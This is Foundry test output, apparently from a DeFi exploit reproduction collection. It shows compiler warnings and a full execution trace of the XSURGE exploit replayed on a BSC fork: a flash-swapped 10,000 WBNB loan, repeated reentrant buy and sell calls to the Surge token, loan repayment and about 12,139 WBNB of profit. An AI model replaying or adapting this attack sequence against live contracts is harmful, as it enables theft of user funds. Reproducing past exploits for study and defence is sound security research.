Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.23s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/XSURGE_exp.sol:47:26:
   |
47 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                          ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/XSURGE_exp.sol:47:42:
   |
47 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                          ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/XSURGE_exp.sol:47:59:
   |
47 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                           ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/XSURGE_exp.sol:47:76:
   |
47 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                                            ^^^^^^^^^^^^^^^^^^^

Warning (2072): Unused local variable.
  --> src/test/2021-08/XSURGE_exp.sol:50:10:
   |
50 |         (bool buy_successful,) = payable(Surge_Address).call{value: address(this).balance, gas: 40_000}("");
   |          ^^^^^^^^^^^^^^^^^^^

Warning (2072): Unused local variable.
  --> src/test/2021-08/XSURGE_exp.sol:68:14:
   |
68 |             (bool buy_successful,) = payable(Surge_Address).call{value: address(this).balance, gas: 40_000}("");
   |              ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 599.12ms (2.40ms CPU time)

Ran 1 test for src/test/2021-08/XSURGE_exp.sol:ContractTest
[PASS] testExploit() (gas: 349411)
Logs:
  Exploit completed, WBNB Balance: 12139323674904800361884

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 10087723 [1.008e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [434311] ContractTest::testExploit()
    ├─ [0] 0x0000000000000000000000000000000000000000::fallback{value: 79228162514264337593543950335}()
    │   └─ ← [Stop]
    ├─ [415194] 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0::swap(0, 10000000000000000000000 [1e22], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x30783030)
    │   ├─ [29962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10000000000000000000000 [1e22])
    │   │   ├─ emit Transfer(from: 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10000000000000000000000 [1e22])
    │   │   ├─  storage changes:
    │   │   │   @ 0x774456c48aa6871068b68c947f132b492bb302d48e494377f521bc0164db1c16: 0x00000000000000000000000000000000000000000000e0ad859cc6d5b5d1e90b → 0x00000000000000000000000000000000000000000000de8f6bbbfd1b0391e90b
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   └─ ← [Return] true
    │   ├─ [351774] ContractTest::pancakeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 10000000000000000000000 [1e22], 0x30783030)
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 10000000000000000000000 [1e22]
    │   │   ├─ [9252] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(10000000000000000000000 [1e22])
    │   │   │   ├─ [112] ContractTest::receive{value: 10000000000000000000000}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Withdrawal(src: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 10000000000000000000000 [1e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0
    │   │   │   └─ ← [Stop]
    │   │   ├─ [36751] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::fallback{value: 10000000000000000000000}()
    │   │   │   ├─ emit Transfer(from: 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 202610381112905 [2.026e14])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 4: 0x00000000000000000000000000000000000000000000000000010acf0f3022c5 → 0x0000000000000000000000000000000000000000000000000001c314f6fb690e
    │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0 → 0x0000000000000000000000000000000000000000000000000000b845e7cb4649
    │   │   │   └─ ← [Stop]
    │   │   ├─ [930] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 202610381112905 [2.026e14]
    │   │   ├─ [39548] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::sell(202610381112905 [2.026e14])
    │   │   │   ├─ [18917] ContractTest::receive{value: 9066401464653037191820}()
    │   │   │   │   ├─ [6051] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::fallback{value: 9066401464653037191820}()
    │   │   │   │   │   ├─ emit Transfer(from: 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 290628772542614 [2.906e14])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x0000000000000000000000000000000000000000000000000000b845e7cb4649 → 0x0000000000000000000000000000000000000000000000000001c099308afedf
    │   │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000000001c314f6fb690e → 0x0000000000000000000000000000000000000000000000000002cb683fbb21a4
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 34: 0x0000000000000000000000001804c8ab1f12e6bbf3894d4083f33e07309d1f38 → 0x0000000000000000000000011804c8ab1f12e6bbf3894d4083f33e07309d1f38
    │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000000001c314f6fb690e → 0x0000000000000000000000000000000000000000000000000002cb683fbb21a4
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21, value: 202610381112905 [2.026e14])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000000002cb683fbb21a4 → 0x0000000000000000000000000000000000000000000000000002132257efdb5b
    │   │   │   │   @ 34: 0x0000000000000000000000001804c8ab1f12e6bbf3894d4083f33e07309d1f38 → 0x0000000000000000000000011804c8ab1f12e6bbf3894d4083f33e07309d1f38
    │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x0000000000000000000000000000000000000000000000000001c099308afedf → 0x0000000000000000000000000000000000000000000000000001085348bfb896
    │   │   │   └─ ← [Return] true
    │   │   ├─ [930] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 290628772542614 [2.906e14]
    │   │   ├─ [30748] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::sell(290628772542614 [2.906e14])
    │   │   │   ├─ [14117] ContractTest::receive{value: 11044931505845149551924}()
    │   │   │   │   ├─ [6051] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::fallback{value: 11044931505845149551924}()
    │   │   │   │   │   ├─ emit Transfer(from: 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 482526704999417 [4.825e14])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x0000000000000000000000000000000000000000000000000001085348bfb896 → 0x0000000000000000000000000000000000000000000000000002bf2e4998548f
    │   │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000000002132257efdb5b → 0x0000000000000000000000000000000000000000000000000003c9fd58c87754
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000000002132257efdb5b → 0x0000000000000000000000000000000000000000000000000003c9fd58c87754
    │   │   │   │   │   @ 34: 0x0000000000000000000000011804c8ab1f12e6bbf3894d4083f33e07309d1f38 → 0x0000000000000000000000021804c8ab1f12e6bbf3894d4083f33e07309d1f38
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21, value: 290628772542614 [2.906e14])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x0000000000000000000000000000000000000000000000000002bf2e4998548f → 0x0000000000000000000000000000000000000000000000000001b6db00d89bf9
    │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000000003c9fd58c87754 → 0x0000000000000000000000000000000000000000000000000002c1aa1008bebe
    │   │   │   │   @ 34: 0x0000000000000000000000011804c8ab1f12e6bbf3894d4083f33e07309d1f38 → 0x0000000000000000000000021804c8ab1f12e6bbf3894d4083f33e07309d1f38
    │   │   │   └─ ← [Return] true
    │   │   ├─ [930] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 482526704999417 [4.825e14]
    │   │   ├─ [30748] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::sell(482526704999417 [4.825e14])
    │   │   │   ├─ [14117] ContractTest::receive{value: 13802312146749223503648}()
    │   │   │   │   ├─ [6051] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::fallback{value: 13802312146749223503648}()
    │   │   │   │   │   ├─ emit Transfer(from: 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1026360351237166 [1.026e15])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x0000000000000000000000000000000000000000000000000001b6db00d89bf9 → 0x00000000000000000000000000000000000000000000000000055c5324fe4027
    │   │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000000002c1aa1008bebe → 0x00000000000000000000000000000000000000000000000000066722342e62ec
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000000002c1aa1008bebe → 0x00000000000000000000000000000000000000000000000000066722342e62ec
    │   │   │   │   │   @ 34: 0x0000000000000000000000021804c8ab1f12e6bbf3894d4083f33e07309d1f38 → 0x0000000000000000000000031804c8ab1f12e6bbf3894d4083f33e07309d1f38
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21, value: 482526704999417 [4.825e14])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 4: 0x00000000000000000000000000000000000000000000000000066722342e62ec → 0x0000000000000000000000000000000000000000000000000004b0473355c6f3
    │   │   │   │   @ 34: 0x0000000000000000000000021804c8ab1f12e6bbf3894d4083f33e07309d1f38 → 0x0000000000000000000000031804c8ab1f12e6bbf3894d4083f33e07309d1f38
    │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x00000000000000000000000000000000000000000000000000055c5324fe4027 → 0x0000000000000000000000000000000000000000000000000003a5782425a42e
    │   │   │   └─ ← [Return] true
    │   │   ├─ [930] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 1026360351237166 [1.026e15]
    │   │   ├─ [30748] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::sell(1026360351237166 [1.026e15])
    │   │   │   ├─ [14117] ContractTest::receive{value: 17260232049506672556408}()
    │   │   │   │   ├─ [6051] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::fallback{value: 17260232049506672556408}()
    │   │   │   │   │   ├─ emit Transfer(from: 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3371949704961729 [3.371e15])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000000004b0473355c6f3 → 0x0000000000000000000000000000000000000000000000000010ab0c6bb325b4
    │   │   │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x0000000000000000000000000000000000000000000000000003a5782425a42e → 0x000000000000000000000000000000000000000000000000000fa03d5c8302ef
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 34: 0x0000000000000000000000031804c8ab1f12e6bbf3894d4083f33e07309d1f38 → 0x0000000000000000000000041804c8ab1f12e6bbf3894d4083f33e07309d1f38
    │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000000004b0473355c6f3 → 0x0000000000000000000000000000000000000000000000000010ab0c6bb325b4
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21, value: 1026360351237166 [1.026e15])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000000010ab0c6bb325b4 → 0x000000000000000000000000000000000000000000000000000d0594478d8186
    │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x000000000000000000000000000000000000000000000000000fa03d5c8302ef → 0x000000000000000000000000000000000000000000000000000bfac5385d5ec1
    │   │   │   │   @ 34: 0x0000000000000000000000031804c8ab1f12e6bbf3894d4083f33e07309d1f38 → 0x0000000000000000000000041804c8ab1f12e6bbf3894d4083f33e07309d1f38
    │   │   │   └─ ← [Return] true
    │   │   ├─ [930] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 3371949704961729 [3.371e15]
    │   │   ├─ [30748] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::sell(3371949704961729 [3.371e15])
    │   │   │   ├─ [14117] ContractTest::receive{value: 20417328646880114254600}()
    │   │   │   │   ├─ [6051] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::fallback{value: 20417328646880114254600}()
    │   │   │   │   │   ├─ emit Transfer(from: 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 22031742032913328 [2.203e16])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 4: 0x000000000000000000000000000000000000000000000000000d0594478d8186 → 0x000000000000000000000000000000000000000000000000005b4b54f5352536
    │   │   │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x000000000000000000000000000000000000000000000000000bfac5385d5ec1 → 0x000000000000000000000000000000000000000000000000005a4085e6050271
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 4: 0x000000000000000000000000000000000000000000000000000d0594478d8186 → 0x000000000000000000000000000000000000000000000000005b4b54f5352536
    │   │   │   │   │   @ 34: 0x0000000000000000000000041804c8ab1f12e6bbf3894d4083f33e07309d1f38 → 0x0000000000000000000000051804c8ab1f12e6bbf3894d4083f33e07309d1f38
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21, value: 3371949704961729 [3.371e15])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 34: 0x0000000000000000000000041804c8ab1f12e6bbf3894d4083f33e07309d1f38 → 0x0000000000000000000000051804c8ab1f12e6bbf3894d4083f33e07309d1f38
    │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x000000000000000000000000000000000000000000000000005a4085e6050271 → 0x000000000000000000000000000000000000000000000000004e45c0ada7a3b0
    │   │   │   │   @ 4: 0x000000000000000000000000000000000000000000000000005b4b54f5352536 → 0x000000000000000000000000000000000000000000000000004f508fbcd7c675
    │   │   │   └─ ← [Return] true
    │   │   ├─ [930] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 22031742032913328 [2.203e16]
    │   │   ├─ [30748] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::sell(22031742032913328 [2.203e16])
    │   │   │   ├─ [14117] ContractTest::receive{value: 21901999307255704364320}()
    │   │   │   │   ├─ [6051] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::fallback{value: 21901999307255704364320}()
    │   │   │   │   │   ├─ emit Transfer(from: 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 269062300501934837 [2.69e17])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x000000000000000000000000000000000000000000000000004e45c0ada7a3b0 → 0x000000000000000000000000000000000000000000000000040a2c7d4985a6a5
    │   │   │   │   │   │   @ 4: 0x000000000000000000000000000000000000000000000000004f508fbcd7c675 → 0x000000000000000000000000000000000000000000000000040b374c58b5c96a
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 4: 0x000000000000000000000000000000000000000000000000004f508fbcd7c675 → 0x000000000000000000000000000000000000000000000000040b374c58b5c96a
    │   │   │   │   │   @ 34: 0x0000000000000000000000051804c8ab1f12e6bbf3894d4083f33e07309d1f38 → 0x0000000000000000000000061804c8ab1f12e6bbf3894d4083f33e07309d1f38
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21, value: 22031742032913328 [2.203e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 34: 0x0000000000000000000000051804c8ab1f12e6bbf3894d4083f33e07309d1f38 → 0x0000000000000000000000061804c8ab1f12e6bbf3894d4083f33e07309d1f38
    │   │   │   │   @ 4: 0x000000000000000000000000000000000000000000000000040b374c58b5c96a → 0x00000000000000000000000000000000000000000000000003bcf18bab0e25ba
    │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x000000000000000000000000000000000000000000000000040a2c7d4985a6a5 → 0x00000000000000000000000000000000000000000000000003bbe6bc9bde02f5
    │   │   │   └─ ← [Return] true
    │   │   ├─ [930] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 269062300501934837 [2.69e17]
    │   │   ├─ [16946] 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21::sell(269062300501934837 [2.69e17])
    │   │   │   ├─ [315] ContractTest::receive{value: 22169323674904800361884}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xE1E1Aa58983F6b8eE8E4eCD206ceA6578F036c21, value: 269062300501934837 [2.69e17])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x00000000000000000000000000000000000000000000000003bbe6bc9bde02f5 → 0
    │   │   │   │   @ 4: 0x00000000000000000000000000000000000000000000000003bcf18bab0e25ba → 0x00000000000000000000000000000000000000000000000000010acf0f3022c5
    │   │   │   └─ ← [Return] true
    │   │   ├─ [21974] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::deposit{value: 22169323674904800361884}()
    │   │   │   ├─ emit Deposit(dst: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 22169323674904800361884 [2.216e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000004b1cd2b78370e197d9c
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x0eD7e52944161450477ee417DE9Cd3a859b14fD0, 10030000000000000000000 [1.003e22])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0eD7e52944161450477ee417DE9Cd3a859b14fD0, value: 10030000000000000000000 [1.003e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000004b1cd2b78370e197d9c → 0x00000000000000000000000000000000000000000000029212f5456ebe217d9c
    │   │   │   │   @ 0x774456c48aa6871068b68c947f132b492bb302d48e494377f521bc0164db1c16: 0x00000000000000000000000000000000000000000000de8f6bbbfd1b0391e90b → 0x00000000000000000000000000000000000000000000e0af25f22fe35389e90b
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 12139323674904800361884 [1.213e22]
    │   │   ├─ [25162] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], 12139323674904800361884 [1.213e22])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], value: 12139323674904800361884 [1.213e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x0a94e286e9304854df5b3f17b7089cd30cba9c4e94387f348447ad723c407a44: 0 → 0x00000000000000000000000000000000000000000000029212f5456ebe217d9c
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000029212f5456ebe217d9c → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000004b1cd2b78370e197d9c
    │   │   │   @ 0x774456c48aa6871068b68c947f132b492bb302d48e494377f521bc0164db1c16: 0x00000000000000000000000000000000000000000000de8f6bbbfd1b0391e90b → 0x00000000000000000000000000000000000000000000e0af25f22fe35389e90b
    │   │   │   @ 3: 2 → 1
    │   │   └─ ← [Stop]
    │   ├─ [2531] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::balanceOf(0x0eD7e52944161450477ee417DE9Cd3a859b14fD0) [staticcall]
    │   │   └─ ← [Return] 20540159788215098835976928 [2.054e25]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x0eD7e52944161450477ee417DE9Cd3a859b14fD0) [staticcall]
    │   │   └─ ← [Return] 1061041006676276872341771 [1.061e24]
    │   ├─ emit Sync(reserve0: 20540159788215098835976928 [2.054e25], reserve1: 1061041006676276872341771 [1.061e24])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 10030000000000000000000 [1.003e22], amount0Out: 0, amount1Out: 10000000000000000000000 [1e22], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x611abf1800000000e0ad859cc6d5b5d1e90b00000010fd8c4b1456fbf153c2e0 → 0x611abf1800000000e0af25f22fe35389e90b00000010fd8c4b1456fbf153c2e0
    │   └─ ← [Stop]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [staticcall]
    │   └─ ← [Return] 12139323674904800361884 [1.213e22]
    ├─ emit log_named_uint(key: "Exploit completed, WBNB Balance", val: 12139323674904800361884 [1.213e22])
    ├─  storage changes:
    │   @ 12: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.99s (4.51s CPU time)

Ran 2 test suites in 6.02s (6.59s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
